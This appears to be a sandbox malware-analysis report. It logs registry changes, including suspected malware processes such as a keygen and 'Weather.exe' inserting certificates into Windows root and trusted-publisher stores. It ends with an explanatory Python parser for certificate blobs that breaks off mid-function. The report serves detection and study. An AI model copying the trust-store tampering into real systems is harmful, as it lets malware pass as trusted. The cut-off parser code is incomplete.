Explorer\EdpDomStorage\stripe.network\ = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\ = "47" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Process not Found Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe 
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CTLs MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\0\MRUListEx = 050000000400000003000000020000000100000000000000ffffffff Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\0\5\NodeSlot = "10" Process not Found Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "472" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11 Process not Found -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B zjqs2pkwltw.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 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 Weather.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b30190
6035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e keygen-step-2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA vpn.tmp Key created 
\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 jfiag3g_gg.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c00000001000000040000000008000004000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82
f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 jfiag3g_gg.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 
040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e
1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 Weather.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 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 Weather.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD Weather.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 
0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201
561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 
030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f6372
6c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 jfiag3g_gg.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 jfiag3g_gg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A Weather.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 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 Weather.exe Key created 
\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 keygen-step-2.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 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 zjqs2pkwltw.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98
323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 jfiag3g_gg.exe -
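The entries above are written under ...\SystemCertificates\<store>\Certificates\<SHA-1 thumbprint>\Blob, and the Blob value is a sequence of records (property id, reserved dword 1, length, data) with property ids from wincrypt.h; the DER certificate sits in the record with id 32, which in this report's blobs is always the last record. The following parser is an added example, not code from the sandbox or the page: it walks those records, recovers the certificate, checks that the key name and the embedded SHA-1 property both match it, and reports which store was touched. The sample entry it runs on is constructed here from a stand-in byte string, not taken from the report.

```python
"""Parse a Windows certificate-store registry Blob and sanity-check the entry.

Added example, not part of the sandbox report. Record layout: property id
(u32 LE), reserved dword that is always 1, data length (u32 LE), data.
"""
import hashlib
import struct

# Property ids that occur in the report's blobs (names from wincrypt.h).
PROP_NAMES = {
    3: "CERT_SHA1_HASH_PROP_ID",
    4: "CERT_MD5_HASH_PROP_ID",
    9: "CERT_ENHKEY_USAGE_PROP_ID",
    11: "CERT_FRIENDLY_NAME_PROP_ID",
    15: "CERT_SIGNATURE_HASH_PROP_ID",
    20: "CERT_KEY_IDENTIFIER_PROP_ID",
    25: "CERT_SUBJECT_PUBLIC_KEY_MD5_HASH_PROP_ID",
    29: "CERT_SUBJECT_NAME_MD5_HASH_PROP_ID",
    32: "CERT_CERT_PROP_ID",
    83: "CERT_ROOT_PROGRAM_CERT_POLICIES_PROP_ID",
    92: "CERT_SUBJECT_PUB_KEY_BIT_LENGTH_PROP_ID",
    98: "CERT_AUTH_ROOT_SHA256_HASH_PROP_ID",
}

# Stores where a new entry changes what the machine trusts; "CA" only caches
# intermediates and is far less interesting on its own.
TRUST_STORES = {"Root", "AuthRoot", "TrustedPublisher", "TrustedPeople"}


def parse_blob(blob: bytes) -> dict:
    """Walk every record (the certificate is last, so no fixed offset works)."""
    props = {}
    off = 0
    while off < len(blob):
        if off + 12 > len(blob):
            raise ValueError("truncated record header at offset %d" % off)
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        if reserved != 1:
            raise ValueError("unexpected reserved dword %d at offset %d" % (reserved, off))
        off += 12
        data = blob[off:off + length]
        if len(data) != length:
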